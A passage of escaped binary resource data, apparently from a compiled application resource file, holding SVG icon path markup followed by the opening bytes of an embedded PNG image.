fill\\\n=\\x22#ffffff\\x22\\x0a \\\n opacity=\\x221\\x22\\x0a \\\n d=\\x22m 215.77\\\n896,180.19599 c \\\n-0.005,-0.099 0.\\\n095,-0.1701 0.18\\\n549,-0.16048 0.5\\\n343,0.003 1.0688\\\n4,-0.002 1.60337\\\n,-10e-4 0.0755,-\\\n0.003 0.15343,0.\\\n017 0.20474,0.07\\\n77 0.13271,0.142\\\n5 0.26641,0.2839\\\n9 0.40109,0.4244\\\n7 0.058,0.0653 0\\\n.12457,0.13491 0\\\n.13049,0.22831 -\\\n0.0237,0.02 -0.0\\\n469,0.04 -0.0698\\\n,0.0602 -0.241,-\\\n0.1539 -0.38974,\\\n-0.42347 -0.6228\\\n4,-0.58951 -0.12\\\n926,-0.009 -0.25\\\n926,0.005 -0.388\\\n76,0.001 0.33103\\\n,0.36449 0.62827\\\n,0.76087 0.96992\\\n,1.11574 0.17193\\\n,0.15668 0.0787,\\\n0.41233 0.0999,0\\\n.61786 0.0101,0.\\\n203 -0.26049,0.2\\\n0553 -0.37889,0.\\\n12403 -0.0641,-0\\\n.14529 -0.0202,-\\\n0.31488 -0.0353,\\\n-0.47029 -0.5683\\\n3,-0.004 -1.1366\\\n6,-0.003 -1.705,\\\n0 -0.008,0.15971\\\n 0.018,0.32373 -\\\n0.0269,0.47965 -\\\n0.12556,0.0592 -\\\n0.36335,0.0494 -\\\n0.36828,-0.13567\\\n -0.003,-0.59052\\\n 0.003,-1.18155 \\\n7.4e-4,-1.77232 \\\nm 0.53996,0.3692\\\n9 c -0.11174,0.0\\\n167 -0.20424,0.1\\\n2175 -0.20276,0.\\\n23895 -0.0104,0.\\\n15415 0.13937,0.\\\n31639 0.29378,0.\\\n27767 0.10114,-0\\\n.0157 0.16231,-0\\\n.11796 0.18205,-\\\n0.21313 0.0281,-\\\n0.1582 -0.11692,\\\n-0.32044 -0.2730\\\n7,-0.30349 m 0.7\\\n8861,0.022 c -0.\\\n12111,0.0445 -0.\\\n20029,0.18604 -0\\\n.15441,0.31487 0\\\n.0434,0.18301 0.\\\n32856,0.27059 0.\\\n41934,0.0808 0.1\\\n2605,-0.18149 -0\\\n.0656,-0.43891 -\\\n0.26493,-0.39562\\\n z\\x22\\x0a id=\\x22p\\\nath3\\x22\\x0a sty\\\nle=\\x22stroke-width\\\n:0.0249874\\x22 />\\x0a \\\n \\x0a\\\n \\x0a \\x0a \\x0a \\\n \\x0a \\\n \\x0a \\\n\\x0a \\x0a \\\n \\x0a \\x0a \\\n \\x0a \\\n\\x0a \\x0a \\x0a \\x0a \\\n\\x0a \\x0a \\\n\\x0a \\x0a \\x0a \\x0a \\\n \\x0a \\\n\\x0a \\x0a \\x0a \\\n\\x0a \\x0a \\x0a \\\n\\x0a \\\n \\x0a \\x0a \\\n \\x0a \\\n \\x0a \\\n\\x0a \\x0a <\\\npath\\x0a fill\\\n=\\x22#ffffff\\x22\\x0a \\\n opacity=\\x221\\x22\\x0a \\\n d=\\x22m 209.51\\\n872,184.46914 c \\\n-0.0271,-0.27387\\\n 0.38826,-0.3482\\\n9 0.49877,-0.125\\\n8 0.054,0.13567 \\\n0.022,0.28704 0.\\\n0321,0.42954 -0.\\\n007,1.15498 0.01\\\n21,2.30995 -0.00\\\n9,3.46467 -0.159\\\n6,0.0448 -0.3295\\\n5,0.0326 -0.4913\\\n7,0.006 -0.0407,\\\n-0.0969 -0.0276,\\\n-0.20426 -0.0289\\\n,-0.30677 0.0128\\\n,-1.15599 -0.010\\\n1,-2.31197 -0.00\\\n1,-3.46796 z\\x22\\x0a \\\n id=\\x22path24\\x22\\\n\\x0a style=\\x22s\\\ntroke-width:0.02\\\n49874\\x22 />\\x0a \\x0a \\x0a \\x0a \\\n \\x0a \\\n \\x0a \\x0a \\\n\\x0a \\x0a \\x0a \\x0a \\\n \\\n\\x0a \\x0a \\\n \\x0a \\\n \\x0a \\x0a \\\n \\x0a \\\n \\x0a \\x0a \\\n\\x0a <\\\npath\\x0a fill\\\n=\\x22#ffffff\\x22\\x0a \\\n opacity=\\x221\\x22\\x0a \\\n d=\\x22m 206.14\\\n917,188.64886 c \\\n0.14899,-0.0248 \\\n0.30809,-0.0395 \\\n0.45388,0.009 0.\\\n0525,0.20503 0.0\\\n382,0.4341 0.011\\\n3,0.64343 -0.083\\\n6,0.21464 -0.473\\\n11,0.16857 -0.48\\\n791,-0.0727 0.00\\\n2,-0.19262 -0.02\\\n69,-0.39208 0.02\\\n27,-0.57989 z\\x22\\x0a \\\n id=\\x22path42\\\n\\x22\\x0a style=\\x22\\\nstroke-width:0.0\\\n249874\\x22 />\\x0a <\\\npath\\x0a fill\\\n=\\x22#ffffff\\x22\\x0a \\\n opacity=\\x221\\x22\\x0a \\\n d=\\x22m 206.85\\\n786,188.64304 c \\\n0.14455,-0.0243 \\\n0.29453,-0.0223 \\\n0.43784,0.01 0.0\\\n607,0.38828 0.00\\\n7,0.78998 0.0207\\\n,1.18358 0.0178,\\\n0.17541 -0.16995\\\n,0.30753 -0.3275\\\n8,0.25969 -0.121\\\n11,-0.023 -0.219\\\n78,-0.13136 -0.2\\\n114,-0.26197 -0.\\\n004,-0.3369 9.9e\\\n-4,-0.67405 -0.0\\\n01,-1.0112 0.005\\\n,-0.0651 -0.005,\\\n-0.17187 0.0819,\\\n-0.17997 z\\x22\\x0a \\\n id=\\x22path43\\x22\\x0a \\\n style=\\x22str\\\noke-width:0.0249\\\n874\\x22 />\\x0a \\x0a <\\\npath\\x0a fill\\\n=\\x22#ffffff\\x22\\x0a \\\n opacity=\\x221\\x22\\x0a \\\n d=\\x22m 208.20\\\n395,188.65595 c \\\n0.15022,-0.0534 \\\n0.32068,-0.0392 \\\n0.47386,-0.003 0\\\n.0348,0.13517 0.\\\n0274,0.27945 -0.\\\n002,0.41486 -0.1\\\n041,0.23439 -0.5\\\n3183,0.15263 -0.\\\n51234,-0.11896 0\\\n.005,-0.0957 -0.\\\n0269,-0.21566 0.\\\n0407,-0.29311 z\\x22\\\n\\x0a id=\\x22path\\\n45\\x22\\x0a style\\\n=\\x22stroke-width:0\\\n.0249874\\x22 />\\x0a \\\n \\x0a \\x0a <\\\npath\\x0a fill\\\n=\\x22#ffffff\\x22\\x0a \\\n opacity=\\x221\\x22\\x0a \\\n d=\\x22m 210.29\\\n771,188.63089 c \\\n0.15343,-0.0111 \\\n0.31179,-0.0203 \\\n0.463,0.0147 0.0\\\n237,0.0995 0.019\\\n2,0.20224 0.0185\\\n,0.30374 -0.004,\\\n1.32988 -0.002,2\\\n.66001 -0.01,3.9\\\n8938 -0.008,0.31\\\n867 -0.54267,0.3\\\n3057 -0.55599,0.\\\n0111 -0.0143,-1.\\\n39214 -0.0133,-2\\\n.78504 -0.0133,-\\\n4.17718 -0.003,-\\\n0.0638 0.0264,-0\\\n.13846 0.0977,-0\\\n.14175 z\\x22\\x0a \\\n id=\\x22path48\\x22\\x0a \\\n style=\\x22strok\\\ne-width:0.024987\\\n4\\x22 />\\x0a \\x0a \\\n \\x0a \\x0a \\x0a \\x0a \\x0a\\\n \\\n\\x0a \\x0a \\\n\\x0a \\\n\\x0a \\x0a \\x0a \\x0a \\\n \\x0a \\\n\\x0a \\\n \\x0a \\\n \\x0a \\x0a \\\n\\x0a \\x0a \\\n \\x0a \\\n\\x0a \\x0a\\x0a\\\n\\x00\\x01\\xa1N\\\n\\x89\\\nPNG\\x0d\\x0a\\x1a\\x0a\\x00\\x00\\x00\\x0dIHDR\\x00\\\n\\x00\\x02\\x00\\x00\\x00\\x02\\x00\\x08\\x03\\x00\\x00\\x00\\xc3\\xa6$\\xc8\\\n\\x00\\x00\\x03\\x00PLTE\\x00\\x00\\x00\\xff\\xff\\xff8l\\\n\\x828l~8h~\\xe8\\x1f(\\xf5.6\\xedsv\\\n\\xcblo\\xd2\\xa9\\xab\\xca\\x08\\x18\\xb6\\x08\\x18\\xf8\\x18(\\xd8\\\n\\x18'\\xc8\\x18(\\xd1\\x84\\x8a\\xf86I\\xbbS^\\xb0}\\\n\\x82\\xf8\\x08(\\xe8\\x08(\\xd8\\x08(\\xf8\\x188\\xe8\\x188\\\n\\xc8\\x08(\\xb8\\x08(\\xc8\\x188\\xf8\\x088\\xa7\\x08(\\xd0\\\nSm\\xe8\\x088\\xf8\\x18H\\xd8\\x18D\\xe8\\x1bH\\xb8\\x19\\\n>\\xd8\\x08:\\xc8\\x089v\\x0a%\\xd4.U\\xf8\\x08H\\\n\\xb8\\x088\\xf8\\x1bX\\xf1\\x91\\xab\\xce\\x95\\xa4\\xe8\\x08H\\xe6\\\n\\x1aX\\xa1_r\\xa3\\x088\\xeeP\\x83\\xce\\xbe\\xc3\\xf8\\x08\\\nY\\xa8\\x14G\\xc1\\x18S\\xef\\x22h\\xe8\\x08X\\x8d\\x17B\\\n\\xec6v\\xd4%hnJX\\x89(O\\xd15y\\xa0\\\n@i\\xcfS\\x8cX8G\\xb1\\x96\\xa3Q\\x125k-\\\nR\\xaf=\\x85i\\x18MX(G\\x90y\\x88\\x80Qr\\\n\\xc5b\\xaaV\\x18KH(E7\\x134i\\x18hX\\\n(XX8XH9Hm/n~k\\x82X\\x18\\\nhs=\\x8cF([T2lQHXYHh\\\nH8XXC\\x86F9\\x8a\\x5cXyZXhH\\\nD|46sFHh\\x93\\x9c\\xbc^l\\x96\\x8d\\x91\\\n\\x9aHXx1Q\\x87^hxCe\\x99o\\x8a\\xaa\\\n\\x0f\\xbf\\xa9\\x0e\\xb2\\x95\\xef\\xa6\\xeav\\xcb\\xbb\\xbb}\\xab\\\nf(\\xac\\x1a\\xf8\\xe6\\xf7y\\xdf\\xea\\xde0\\xffM\\xfdu\\\n\\xed\\xfb\\xddt\\xc7\\x14\\xb8\\x1d\\x01\\x0cB\\x94\\xd2\\xb2\\xbf\\xfe\\\n{Gu\\xb7\\xa4\\x8d1\\x87R\\xfb>\\xbfv\\xc5\\xdeO\\\n\\x95\\xfa\\x86\\x16\\xe7\\xaa\\x5c\\xb2BhuW\\xdb\\xbe1\\x8e\\\npsz\\xc39i\\xdc>\\x05n\\x9b\\x00F=\\xdb\\xbe\\\n.\\x00\\xd8w\\xfd\\xc6\\xc2\\xdb\\xea\\xcd[\\x00\\xe0\\x1b\\xe9\\xf4\\\n\\xcd\\xfa\\xd4=\\x00\\xe0\\x9b\\xe6\\x087%\\xf2\\xe6\\xd3\\xff\\xd6\\\n)p\\xf3\\x040\\x00\\x02\\x90\\xad\\xd1\\xff\\x0a\\xf7\\xabti\\\n{>\\xdfH\\x1b\\xd4\\xf8\\xabR\\x8e7M\\xd7T\\x80\\xbb\\\n*\\xff\\xf9\\x8f=\\x80\\xb7\\x84\\x9c[\\xa6\\xc0\\x8dS\\xdc\\xd0\\\n8\\xa86\\x06e\\x7f\\xde;\\xa6d}\\x0d\\xc1~\\x08 \\\nX/\\xbd\\xcd\\x0a6?\\xdf\\xad\\x11\\x00\\x14\\xd9\\xfe\\xd9W\\\n/\\xa9\\xf2\\xedo\\xd1\\x9eB\\xab\\xef\\xc9\\x1e\\x08Xq\\x8a\\\n\\x0a*\\xc8\\x0e\\x04\\x5c+u\\xa7\\xde\\xdd\\xef\\xf7\\xf1\\x9e\\xdb\\\n:\\xf2^y\\xf6\\xf5C\\xd5\\xde\\x9bf\\xc0\\x0d\\x08`\\x10\\\n(\\x10\\xa2@\\x94\\x02\\xa9\\xeev{\\x04\\xd7\\x0d\\xbbu\\x06\\\n\\xd4\\xb2R\\x91M\\xf6\\xa26>\\xdf\\x90\\xa7\\x1b\\xa3\\xa0\\xf6\\\n\\x03F\\xfd\\xd5\\xb5\\x0f\\xf7\\x90x\\xb5\\xff\\xbb\\xbd\\xa5ns\\\n\\x12\\xb2\\xe2\\x00{e\\xfd&G\\xd8\\xe0\\x0d\\xbb\\x05n\\xd5\\\n{\\x0f{\\xc7\\xad\\x8b{\\xd5_\\xb7C\\xcf\\xde\\xb1 \\x80\\\n\\xba\\x09\\x04\\xf6O\\x00\\x83\\xa8-\\x00\\xd8\\xc4\\xe5\\x9d\\x977\\\n\\xcb\\xea\\xed^\\xfd:\\x01@U\\xf5n\\xfe\\xec\\xa9\\x9b\\xd4\\\n\\xf9nl\\xd5F\\x99\\x1b\\xdf\\xef\\x01\\x80\\xf5\\xf7;\\x00\\xb0\\\n\\xc9\\x1b\\xb6K\\xdc\\xa9W\\xed~\\xbdQ\\xf3}\\xf8\\xc4\\xaa\\\n!\\xb7L\\x93}\\xfdP\\xb7\\x170\\xf6\\xce\\x80}\\x13\\xc0\\\n\\xa8k$\\xb7Tx/\\x11\\xb8\\x91i\\x97\\x03l\\xaai\\\ndo\\xfe\\x1b\\xeb\\xb8\\x9f\\x0d\\xe5f9~\\xf7\\xd5\\x1b\\xd7\\\n\\xeeY\\xd9\\xfa\\xb37\\xb5\\x1b\\xdc\\x96\\xff\\xbe\\xf7\\x83\\xdba\\\nb\\xdfw\\x1b\\x14\\xceT{\\xa6\\xc0\\x9eef\\xe8Ok\\\n\\x08\\xb8\\x8bv\\xaf\\xa7\\xd8\\xb5&\\xec,\\xe9o\\x1c\\x02\\xb6\\\n\\xb9\\xaa\\xda\\x82\\x80\\x8d\\x95v}\\x95T\\x7f\\xeb\\xefw!\\\n\\xe0\\xa6\\xf1Q5\\x1f\\xd9W\\xea.\\x07 \\xb7\\xf4\\xcd\\x1d\\\num\\x96Op\\x83\\xdd\\x04;}\\xb9[\\x06\\x81\\x22{\\\nf\\xc0u\\x040\\xaaRk\\x0ep\\xc3\\xa4\\xdbY\\xc1\\xd7\\\n\\xa0\\x12\\xd7d\\xfa\\xd7\\xc8\\x01\\xc8\\xf5F\\xd5\\x1fmqV\\\n\\xb2\\xdd\\xbem\\xb1\\xbe\\xd1\\xce\\xcd{\\xd2\\x17lr\\x80\\x1b\\\n\\xe7?\\xa98\\x00\\xd9S\\xeaunts\\xdf\\xdcU\\xd7\\\nF\\xf9\\xba\\x1f\\xf7\\x97\\xba\\xdd\\x97\\xbbI\\x11\\xec\\x13\\x03\\xd7\\\n&@\\xed\\xf0[\\x03\\xc0\\xfe\\xb4\\xcd\\x01\\xc8\\xce\\xa7\\xd5W\\\n\\x9b\\xed\\xfc9\\x00\\xc0\\xb6,U[\\x00\\xb0\\x1e\\xe5\\x9b\\xf9\\\n\\xb8\\xda\\xb8\\xa1\\xf5\\xa2\\xbc\\x19\\x9f\\xd5ZB\\xee\\x03\\x80\\x1b\\\n;c\\xe7m\\xb5\\xf2w\\xd7\\xf6f=\\x9b\\x00@v\\xbf\\\n[\\xdf\\x88Zg\\xdbMD\\xeb\\x08\\xd7f\\xc0\\xee\\x04X\\\n;|+\\x0ep\\xd3\\x14\\xb8A\\x84\\xdd8\\xe9\\xbfi\\x0e\\\np\\x9b\\x5c\\xde\\xf9\\xee\\xe6\\x11\\xdd\\xa4\\xf47p\\x80\\x9d\\xfc\\\nj\\xeb\\x9a[\\xd2\\xb5F\\xef\\xeb\\xc0\\x9b\\xca\\xd8h\\xcf\\x8d\\\n\\xf2\\x0b\\xb7\\xdbNT\\xf5{w\\x06\\xec\\x0c\\xf0\\x86\\xc3\\x7f\\\n\\xa5\\x06\\xdcL-7^_\\xabwW.\\xeeB\\xc0\\xf5\\\n\\xc6}}\\x10\\xb0)\\xcb\\xdf\\x08\\x02\\xa0\\xefy\\x17\\x02n\\\n\\x96\\xab\\xeaV\\x08\\xd8\\xbc\\xbf]6}\\xf3Z\\xddl\\xcb\\\n:\\x8f\\x22\\xfb\\xf1Amu\\xea-\\x10\\xb0*s{\\x06\\\nl#\\x80\\xb1\\x95\\xb3\\xe6\\x00{\\xd3\\xf6\\x0a\\xbe\\xae\\x9b\\xef\\\n\\xc8\\xc5]\\x0e\\xb0OG\\xfe\\xea\\x1c`S\\xc8o\\x08\\xff\\\n\\xad\\xb6\\x5c\\x97\\xd6\\xdbm\\xb9\\xc6\\x01\\xf6\\xdb\\x02\\xea\\x8b\\xc9\\\n\\x8aq\\xee|\\xb1\\xc1\\x01H\\xdd\\xe8\\xcd\\xaf\\xf7\\xb1\\xe6\\xeb\\\n\\xf7\\xb4\\x91\\xe7V\\xbb\\xd8\\xeaF\\xc8\\xfa\\xe5\\x0di\\x1b\\x03\\\n\\xcc\\xed7\\x1b\\xeb\\xe4\\xcd\\x00\\xe0Z\\x9e\\x9d\\x0fo\\xe2\\x00\\\nu\\xde\\xdd\\x0fIm\\xd6\\xba~\\xd7_;\\x00l\\xb7\\xe5\\\nF\\x00\\xd8#Wo\\x03\\x80mn\\xb1\\x03\\x00\\xfb\\x84\\xde\\\n\\xf5\\xb4Y\\xf6M\\x06\\xd7\\x8d>\\xda\\x04\\x80\\xdb&\\xd6\\xd6\\\n\\x0c\\xd8\\x9c\\x00\\xdb\\x01_\\x15\\x07\\xb8\\xa9\\x94\\x1b8\\xc0\\xf6\\\n\\x87\\xb7p\\x80\\xbd\\x85\\xed\\xc8\\xb3\\x1b\\x0a\\xbf\\x93\\x03\\xecv\\\n\\xef\\xbd9\\xc0f\\x0er\\xed\\xe5\\x9e\\x86\\xdc\\x93\\x03\\xecS\\\n\\x13\\xee\\x93\\xee\\xc9/6\\xa1\\xe2>\\xb5l\\xce\\x80\\xcd\\xa9\\\nb\\x90-\\x0b\\xfb\\x06\\x04\\xec\\xfbY\\x97\\xb0Z&\\xbb\\xfc\\\n\\xf4&\\x08\\xd8+\\xcb6\\x1as\\xd3\\xf7\\x1bE\\xdd\\x0a\\x01\\\n\\xabkt\\xcbn\\x85\\x80;d\\xf0\\xed\\x10\\xb0\\xd1\\xb0\\xed\\\n{\\xdd\\xc9B6\\xf4\\x85\\xbb\\xab\\xdd\\xbanU\\xf6=|\\\n.\\x1bb\\xf9\\x16\\x0e\\x80-\\xc7\\xc0\\x06\\x02\\x18\\xdb\\x1a\\xc6\\\n\\x9bq\\x80Z\\xdcn\\xe6\\xb8\\x89\\x03\\xec-rc\\x91\\xdc\\\n\\xf4\\xfdFQ\\xb7r\\x80\\x8d\\xdbX93o\\xe2\\x00w\\\n\\xc8\\xe0M\\x0e\\xb0_\\xae\\xaa\\xeb\\x1c`O\\x99d\\x87\\x03\\\n\\xdc7\\xa6aMj69\\xc5\\x0d97@\\xf3\\x8e\\xf2\\\n7 `=\\x01\\x8c\\x9dE\\xf5\\xc6\\x00\\xb0o\\xdeo\\xb4\\\nO][\\xa0\\xdb\\xb9\\xd7(\\xb27\\xc3\\x16\\xd7\\xc5=8\\\n@U\\xd3\\xed\\x00p\\xfb0\\xa8m\\x00\\xb8mb\\xde\\xa4\\\n\\xe0\\xd4_\\xee\\x02\\xc0\\xad\\x13o'\\xd7&\\x97\\xb9\\xad\\xad\\\n\\xd7[ucZ\\xcf\\x80\\x9b\\xe3\\x01\\xde\\x90\\x03\\xdc\\xc8\\x03\\\n6\\x1bx\\xc7\\x14\\xbe\\xf3\\xfb\\x8d\\xa2\\xf6~\\xbd\\xe7su\\\n\\xfd\\xbb\\xfb\\x0bcrw\\xb3\\xeeS\\xea\\x96.\\xf1\\x06i\\\nu\\xcd}.}\\x0b\\x8a\\x01lLE\\xe3\\xfaZ\\xd7:\\\n1p\\xa3\\xef}\\x17\\xf3w\\x1a\\xbf\\x17\\x02\\xee\\xd3\\xce\\x9b\\\n\\xc8\\xcc\\x9a\\xed\\xe2^\\x1c\\x00u\\xdb7o\\xb4z\\xf5\\x96\\\n\\xfduG\\xab\\xf7\\xe0 \\xd6\\xa2d\\xd5\\x827-\\xf9\\x06\\\n\\x1b\\xc0N\\x9e\\xfb\\xf1\\x8a\\xeao\\x0d\\x015\\x02\\x18{\\x14\\\n9r\\x03\\xe8l\\xc7\\xce\\xad^\\xef\\xd5\\xa7W\\xd7T\\x1c\\\n\\xe0~\\xd0w+\\x0fx\\x13\\x0e\\xb0\\xfb\\x1d\\xeaW\\xf7j\\\n\\xc7\\x9b\\xa5J^\\xef\\xa9[\\x91-\\x0e\\xf0\\x16u\\xdfK\\\nd\\xbcQ\\xb0X-\\x04V\\x22\\xe0\\xba\\x98\\xdf\\x18\\xe8\\x1b\\\n\\xe4\\xff\\x8eGc\\x9f>\\xbd\\xba\\x03\\xd4\\xd1\\x05\\xf7\\xb9\\x93\\\n[\\x09\\xf7\\xfd9@\\xddv\\x5c\\x03\\x80\\xaf\\x7f\\xfd\\xdf\\x84\\\n[\\xea\\x1a\\x00\\xbcy\\xdd\\xb7-n\\xb5\\xce\\xf3V\\x93\\xba\\\n\\x9a\\x00\\xc6\\xfe\\xa6_{\\xb5\\xdb\\xb2\\x1b^\\xef\\xf9\\xecN\\\n\\x0epS\\xb9\\xd7?\\xff\\xf9q\\x807K\\xfb\\xcb%o\\\n\\xcf\\x01\\xeat\\x87\\xaa\\xf2v\\xa9\\x82\\x80j\\xda\\x18\\xb8\\xbe\\\n\\xa6\\xd6:\\x19\\xc1\\x9e/v\\x1bW/\\xb5\\xcd\\xef\\xb6\\xed\\\n\\xd4\\xf7\\x84\\x80J\\xf9\\xc0\\xfe{\\xdb\\xa4\\x11\\xfb \\xe0&\\\n\\xee\\xf0&\\x10\\xf0\\xe6\\x18\\xb1\\xaaa\\xbf\\x06C\\xbe\\x22\\x04\\\n\\xdcR/\\xd9\\x80\\x80\\xfb]Q'=\\x014\\x02\\x18\\xfb\\\n\\xa4\\x8c\\xaa\\x19\\xf0\\xaeP\\xbd\\xb1\\xa6\\xeb\\xa2y=V\\xaa\\\n\\x8a0\\xbc\\xbb\\x95d\\x1d\\x8a\\xb6\\xb7\\x8e\\xfde\\xac\\x16\\xda\\\n\\xcd\\xdfU-\\xd9wK{\\xf2\\xbfQ\\x22w\\x94\\xbb\\xc9\\\n\\x01\\xbe\\xce}\\x0d\\xeb%u\\x97\\x9d\\xe0z\\xd2\\x10p+\\\n\\x07\\xa8\\x0a\\xde\\x05\\x80\\xfd\\x9d\\xac\\xae\\xaf\\xbf=\\x00p\\x8f\\\n\\x8eU\\xe46}Am\\xade\\xa2\\x08\\xc8f\\xdd7\\xd9\\\n\\x10\\xae\\x01\\xc05\\xb4\\xdan\\xf9\\xdd\\xcd\\xdc[\\xc3M}\\\n\\xb3\\x05\\x00_#\\x01U\\x9b\\x00\\xf0\\xf6\\x1c\\xa0\\xde\\xfe\\xb7\\\nSxU\\xf2\\xfd\\x96\\xc3>\\xfc\\xbb\\x16\\xf6\\xf2\\x06\\x1c\\xe0\\\n>\\x06\\x08\\xb5\\xf1\\xf7\\xd6\\xa2\\xb7\\x95y\\xb2\\xd3\\xb4k\\xe5\\\n\\xbeE\\xba\\xd5\\x5c\\xf0U9\\xc0\\x9d5\\xbf]2\\x96\\xa8\\\n\\x11\\x80\\xa8}6\\xbf\\x95d\\xdb\\x07\\x01\\x1b\\xaa \\x00\\xec\\\nx\\xd1\\xd6=\\xb2\\xf3\\xfeV\\x01\\x5c\\xb3\\xf8\\x1a\\x026\\xaf\\\n]\\xcf\\xf4\\xf5\\xe5\\xaby\\xb2\\x0f~vJ\\xde\\x0b\\x01+\\\nVyMwx\\xc3n]\\x19:\\xf7\\xde\\x1fYU\\xbb\\\n~{W\\xda\\xbc\\xf7{\\xe5$;L\\xe3\\x9e\\xd7\\x9b\\xd0\\\nA\\xe0{\\x00\\xa4R\\xb7\\xf7\\x08\\xdd[\\xe4\\xf3\\x86H\\xda\\\nj\\xc0\\xe6\\xfb\\xdb\\x95\\x8a\\xaa\\x1bw\\xcbZ\\xbd\\xbe\\x81G\\\n\\xdcn\\xff&\\xd79\\xc0\\xc6\\xac\\x22\\xbb\\x88\\xf0v\\x9a\\xfa\\\n\\x8a\\x08\\xdc\\x90\\xa3.\\xfck\\xde\\xdb\\xb8\\x7f\\x12\\xef\\xf6\\xfb\\\n\\xbed,\\xf5\\x04\\xb8\\xb6\\xf4\\xef\\x06\\x80\\xeb\\xb7\\xb0\\x0d\\x00\\\n\\xd7\\xbe_\\xb3\\xc1[\\xe6\\xa4Z\\x15t\\xbd\\xac\\xd5<\\xdf\\\n#C\\xc9z\\x05\\xeeM\\xe4\\x06\\x00X\\xcf\\x897\\xf1\\x10\\\n\\xdc\\xd0\\xf6[\\xf5\\x90\\xf57\\xf7\\xe3A\\xf7M\\xeb\\x85\\xbb\\\n\\xab\\x9e\\xd56\\x93\\xbb\\x92\\x89\\x1bg\\x89Z\\xd1\\xaa\\xfb\\xc0\\\nJ\\xdd\\xa1wVy\\x07\\xfd\\xae\\xff^+kW\\xe6\\xbc\\\nA\\xb9;\\xfc\\xe3:\\x07\\xb8W\\xc3\\xefL7\\xb3\\xd0\\xcd\\\n\\x0a\\xbf\\xd6\\xe5\\x7f\\xb3@\\xbd7\\xddR\\xbba\\x00o\\x09\\\n\\x01j\\x0f\\x04\\xec%\\x86\\xb7\\xe8\\xab\\xf5*\\xda\\x84\\x80}\\\n\\xd7\\xbf\\xb9\\x9e^\\xb7\\xa6\\xba\\xe5\\x15\\x04\\xa8\\xd5'\\xdb\\x10\\\n\\xf0v\\x94M\\xdd\\x06\\x01o^\\x96n\\xca]\\xf9\\xb6 \\\n\\xe0n]f;\\xc7R#\\xc0\\x0d\\x0a\\xd7-\\x1c\\xe0F\\\n9\\x5c\\x03\\xf6:^~_\\xc1{\\xeb\\xc3\\xfa\\x8a5\\x07\\\n\\xb8Y\\xaf\\x7f\\xe3\\xb4f\\x11X\\xf9\\x13H\\xfd\\xc9\\xd6\\x88\\\n\\xbf-L\\x93\\xfd\\xdd\\xf5\\x0d\\xa7M\\x11\\xb9\\xc54\\xefu\\\n\\x0f\\xe6\\x9e\\xf5}\\x1f\\x00\\xb8.\\x87w\\x00\\xe0&\\x19t\\\n\\x9b\\xbez\\x1d\\x00n\\xe4\\x1a\\xf7\\xb9\\xb7\\x9d\\xb4f\\x11w\\\n\\x03\\xc0\\xdb\\x0d\\xa1\\xba^\\xd47\\x9e\\xb6\\x01`G\\xed\\xbe\\\nG2o\\x9e(_\\x89\\x03\\xdcX\\xffm\\xbd\\xb3)'\\\no\\x12\\xcbo\\x07\\xffu\\xa9\\xab\\xbf\\xeb\\x9b\\xab\\xff|\\x1d\\\n\\xcb\\x96|=\\xc5\\xbcI\\xba\\xb1\\xa3\\xef\\xd9\\x10\\xa2\\x0c\\xb2\\\nm\\x06\\xac\\x0b\\xde\\xb2\\xaf\\xbf\\x05\\x07\\xd8\\xc0\\xa4\\xfb\\xb4e\\\ns]\\xded\\x0a\\xac\\xf2\\xbc%\\x04(\\xb2\\xd5\\xa4\\x1b \\\n\\xe0\\xe7=\\x80\\xbb\\xe9\\xa6\\x05r#\\xb9\\xac\\xefa\\xa7\\x8c\\\n\\xdb\\xeec\\xa3\\x8e\\xa5y\\x1bX|%\\x0e\\xb0\\x12\\xaf\\xf7\\\n\\x93E\\x1b\\x82\\xb9\\xe6\\x00{\\xfd\\xfa:\\xf6\\xfd\\xed\\xe4\\xec\\\nF\\x93n\\xe2\\x00?W\\xf8\\xfez\\xd2\\x8aoo~r\\\n\\xef\\xfb0Wku\\xb7\\xd8\\xdb\\x01\\xe0\\xbe\\x1c\\xe0\\xde\\x8b\\\nU]\\x07\\x80ku\\xd4my;9{7\\x00\\xfc9\\\n \\xf8WN\\xd7u\\xda\\xd5\\xc7\\xf7J\\xe6\\xcdV\\x00|\\\n-\\x1c\\xe0\\xde-!\\xdb\\x17\\xed\\xbd\\x8e\\xdc\\x0do7\\xa7\\\n\\xad&}3\\x1c\\xe0\\xcf+}\\x85\\xb6_\\xd3\\x026\\xca\\\n\\xdc\\x18\\xcb\\xad\\x1c{\\xbaK\\xed.\\xcd\\x1a\\x97n\\xd4\\xe7\\\n\\xab\\xef\\xd7\\xf7p\\x0d\\x02\\xae\\xdb\\xe3\\xf5\\x98\\xa9\\xb7\\x1a\\xae\\\n\\xb5\\x9d\\xfc\\x06\\x08\\xb8W\\x19\\x1b\\xedx\\x8b\\xefo+\\xf7\\\n\\xab\\xcc\\xbf\\xfb\\x22\\xd7\\xbezLc\\xc7\\x82\\xb8O\\xf1\\xba\\\n+G\\x9d\\xe7\\xba\\x1d\\xe0N}~\\xdd6\\xb2\\xc3\\x01n\\\n\\x06\\xf9\\xb7\\x93\\xff\\xdb\\xb4\\xe4:\\x07\\xb8O\\x19u[\\xdf\\\n\\xf2\\xfb[\\xae\\xfb\\xb9p\\x8f=\\xfdf\\x98\\xbb\\xea\\xff\\xb5\\\n\\x8bv\\x01`oS\\xd5.\\x00(`S/\\xde?d\\\n\\x1bE]\\x03\\x80\\x1b\\x89\\xe9-v\\x84\\xdb\\x92\\xda\\x06\\x00\\\n\\xb5n\\xe5\\xa6,\\xb8\\xe5\\xfa\\xed\\xb6\\xde\\x82ho>=\\\n\\x7f^\\xc6\\x83\\xbd\\x08pW\\xc5\\xf7]\\x1e;\\x1c@\\xa7\\\n[\\xf4\\xf9\\xfa\\xfb\\xcd\\xd7\\xf7!\\x0eo\\xdfQ\\xd7K\\x7f\\\n#\\x83/\\xb9\\xe1\\xf5My\\xde$m\\x91\\xa7o0\\xed\\\ni\\x1f\\xa1\\xbb\\xf6?l7\\x84\\x5c\\xe3\\x00\\xfb\\xbb\\xedF\\\n7!*\\xf6\\xbe\\xff\\x9auC\\xd4\\xfa\\xd7\\xad\\x10\\xb0\\xd1\\\n\\xbe\\x9f\\x17o\\xdb\\xa0\\x0b\\x00\\xae/W\\xb2\\x9d\\xe7\\xcd\\xf9\\\n\\xc9=\\xd6\\xffW\\xbd\\xd7\\xba\\xbfvk\\xda\\xdd\\x19\\xb4{\\\n\\xee]\\x15\\xd3\\xbe\\xd5\\x94[d\\xe0\\x9b\\xfa\\xea\\xb7\\x17\\xa3\\\nR\\x1b\\x13\\xe1\\x8e\\x19\\xf0\\xf3\\x92\\x9b\\xab\\xba\\xd6\\xcd\\xd9]\\